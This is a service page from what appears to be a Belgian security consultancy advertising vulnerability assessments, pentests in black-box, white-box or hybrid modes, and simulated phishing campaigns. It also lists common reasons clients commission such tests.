Involve security aspects from very beginning of your IT project
Vulnerability Assessment and pentesting in Brussels and abroad
Vulnerability assessment or pen-testing will bring you an external view on security of your IT infrastructure and allow you to assess security of your environment or your application.
Applications of your infrastructure project may contain some vulnerabilities or some mitigations could not be configured as they should be. Automated cyber attacks, viruses, ransomwares, hackers, internal fraudsters could take advantages of these vulnerabilities and cause serious troubles to your organization.
Our Vulnerability Assessment, or pentesting service, helps you to identify vulnerabilities and fix them before it’s too late. We will deliver you a detailed report and professional advise how to fix issues and improve your security.
Which methodology are we following ?
We are working in different modes: white-box or black-box pentesting.
Each methodology has advantages and disadvantages.
The pen-tester is acting without any knowledge of the system running at the customer. He is acting as an external intruder who would breach your system. The findings of this pentest are representative of what a user could do without any specific knowledge of installed systems, without local account or knowledge of design.
Nevertheless, testing time could not be maximized in this scenario. Some areas of infrastructure might remain untested (e.g. parts of network only accessible from specific zones or IP).
In this case, the pentester has reviewed all documentation, architecture and design which are in scope of the pentesting: documentation regarding website, application or web application or infrastructure assets. The pentester is able to identify potential weaknesses in advance and can concentrate his time to analyse priority attention points. In this scenario the pentester is simulating an intruder who has access to a limited quantity of information (such as design or IP addresses) of a target system.
Our recommended methodology is hybrid and based partly on black-box and partly on white-box to combine advantages of each methodology. We are standard using a non destroy way of working.
Our domains of expertise:
Web Application Vulnerability Assessment (WAVA)
Targets: websites and web applications
We are mostly looking for most common vulnerabilities (OWASP Top 10) which are representing 90% of all web attacks in the industry such as SQL injection (inband, OOB, Blind), XSS, CSRF etc.
Identify vulnerabilities in framwork (Java, .Net, PHP) or in configuration.
Analyse modules or extensions of framework
Validate configuration of all layers, from Operating System to Application, database etc.
Report vulnerabilities, but also conceptual and architectural issues (absence of encryption, password policy etc.). This approach is risk based and allows technical and non technical people to understand level of risks they are facing.
Application of security assessment
Target : FAT client applications, business applications, VoIP/IP PBX or media applications, Web-services etc.
Based on project, new infrastructure or application renewing, we will test its security level and deliver you a report.
Infrastructure security assessment
Target: Partner link, IPSec, SSL VPN, work@home solutions, Extranet, Wireless networks, 802.1x solutions, BYOD, datacenter, Active Directory..
Besides applications, infrastructure components have a predominant role in global security of your organization. Be sure they are securely configured and patch level is up to date.
Target: Test your incident response and evaluate reactions of your employees facing external threats.
Social engineering is an excellent tool to get maximum information in minimum time. Attacks named “spear phishing” can target only few users who are accessing extremely sensitive information (such as CEO, HR director, system administrators). These people could receive via email a fake Linkedin invitation containing resume, or security update from software supplier). They open attachment or link provided in the message and their computer gets infected by a dangerous malware.
We can simulate this kind of attacks and contact, with your agreement, some of your staff members. We can therefore establish global statistics about reactions of users. This exercise is very interesting to set up before and/or after a security awareness session followed by your staff. Some of your staff members are security aware and can help organization to alert the ICT services about potential cyber-attacks. Other staff members don’t have any knowledge about cyber-security and could easily become victims of hackers. Identify those users and offer them opportunity to learn more about cyber-security, what are potential dangers and how they need to react to those threats.
Why setup a pentest ?
The reasons are multiple. You can find a non exhaustive list of reasons why we have previously been contacted by customers regarding setup of pentests:
- Build a governance process around development and deployment of new applications for organization
- Setup a validation process before go live of Internet facing applications
- Mitigate risks related to conceptual or implementation issues in scope of infrastructure or application projects
- Answer audit points or be in-line with a compliance
- Evaluate level of maturity in security domain of your organization or of a sister-organization which was recently purchased
- React immediately to security problems: ensure all assets have been correctly patched
- Anticipate attacks, take initiative and be an actor in security prevention
- Test your Guest Wi-Fi network: is a visitor able to access your internal network ?
- Test your SSL VPN solution: our staff is using massive home working solutions, but is a hacker able to bypass our policies and connect from unauthorized computer to the enterprise network ?
- Test your Wireless solutions: how strong is our Wireless solution to protect against unauthorized access ?
- Our main firewall has more than 3000 firewall rules, are the rules up to date ? Are the rules in line with applications documentation ? Is approval process to add/delete rules under control ?
- Part of our ICT infrastructure is outsourced. The IT company managing our ICT infrastructure is remotely accessing our environment. Is this channel of access sufficiently secure and what would happen in case of misuse ? Do we have enough auditing to trace what happened ?
- How many servers are still running outdated OS systems or outdated databases ?